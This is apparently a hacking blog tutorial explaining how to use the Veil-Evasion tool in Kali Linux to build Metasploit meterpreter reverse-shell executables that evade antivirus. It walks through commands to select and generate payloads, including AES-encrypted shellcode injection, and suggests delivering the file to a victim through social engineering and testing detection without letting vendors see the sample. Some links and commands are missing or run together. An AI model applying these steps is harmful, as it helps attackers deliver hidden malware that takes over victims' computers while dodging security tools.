How To Bypass Antivirus Detection Using Veil-Evasion In Kali Linux

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either create your own exploit, or
change the signature of a known exploit or payload.

As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.

Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

Some days ago Veil v2.0.4 was Released. I’m want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

  • x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
  • Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

There are tutorials available at The framework can be downloaded from Chris’ github at or at

How to setup?

Veil-Evasion’s code is located at and it’s a part of the Veil super project at which we recommend mosts users clone and install.

We can also use the payloads from Metasploit framework and its compatible for both x86 and x64 arch and update Veil either the command line or menu.

If you want to install Veil in your own environment you can use the commands below:

#wget -c
#unzip -q
#cd Veil-Evasion-master/setup

If you want to work with Kali Linux, with the commands below it will be enough:

apt-get update apt-get install veil

i am using kali linux for this tutorial, so i will start with second one.

1. Install Veil-Evasion

We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:

kali > apt-get install veil-evasion

To start Veil-Evasion, just type:

kali > veil-evasion

When you do so, you will be greeted with this opening screen:

Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it “y” for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take awhile, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select “Install for all users” and click the “Next” button.

Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click “Next.”

Eventually, you will come to a screen like that below. Go ahead and click “Next” again.

Continue to click “Next” through several screens until you finally come to a window with the “Finish” button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.

2. Create an EXE with a Payload

In this first step, we will create a simple .exe file that will contain a payload that enables us to own the victim’s system. This could be used to send to the victim and having them click on it to execute it. Generally, this type of attack will be part of a social engineering attack.

Let’s now type “list” as this will list all of the payloads that Veil-Evasion can work with.

Those of you who are familiar with Metasploit will recognize many of these payloads.

3. Use a Payload

In this case, let’s use the ruby/meterpreter/rev_tcp, or number 44. Let’s type:

> use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

We will need to set LHOST and LPORT.

> set LHOST> set LPORT 6996

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.

> generate

As you can see in the screenshot above, Veil-Evasion has generated an new .exe file that I have named “newpayload.exe” (you can name it whatever you please).

4. Generate an Encrypted Payload to Evade Detection

Next, let’s attempt to create an encrypted payload that we can get past AV software and other security devices. In this case, we will use a different payload on the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates a executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type:

> info 32

It then returns info on this payload as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

Next, let’s tell Veil-Evasion we want to use this payload.

> use 32

Here we have the option to change the default options if we care to do so. For now, let’s leave the default options as they are.

Next, let’s tell Veil-Evasion we want to generate this encrypted payload.

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take few minutes, so be patient.

Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple “veilpayload.”

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.

5. Checking Antivirus detection

Now, we have our executable and we are going to submit it to Please, remember to check “Do not distribute the sample”. If you choose to don’t check this options or you decide to submit the executable to your file will be investigated and maybe it will be recognized by some anti-virus vendors.

You can see in the picture below any of the anti-virus vendors have detected our file as malicious. We have got a rate detection of 0%!!!!

Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.

Recommended Tutorials:

Heartbleed Attack: Exploiting OpenSSL Vulnerability Using Metasploit
Msfvenom: One Single Tool Instead Of Msfpayload And Msfencode
How To Get Root Access When People Visit Your Website – Metasploit Exploiting IE8

Sharing is caring!

One thought on “How To Bypass Antivirus Detection Using Veil-Evasion In Kali Linux

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Posts

Begin typing your search above and press enter to search. Press ESC to cancel.

Back To Top

So glad to see you sticking around!

Want to be the first one to receive the new stuff?

Enter your email address below and we'll send you the goodies straight to your inbox.

Thank You For Subscribing

This means the world to us!

Spamming is not included! Pinky promise.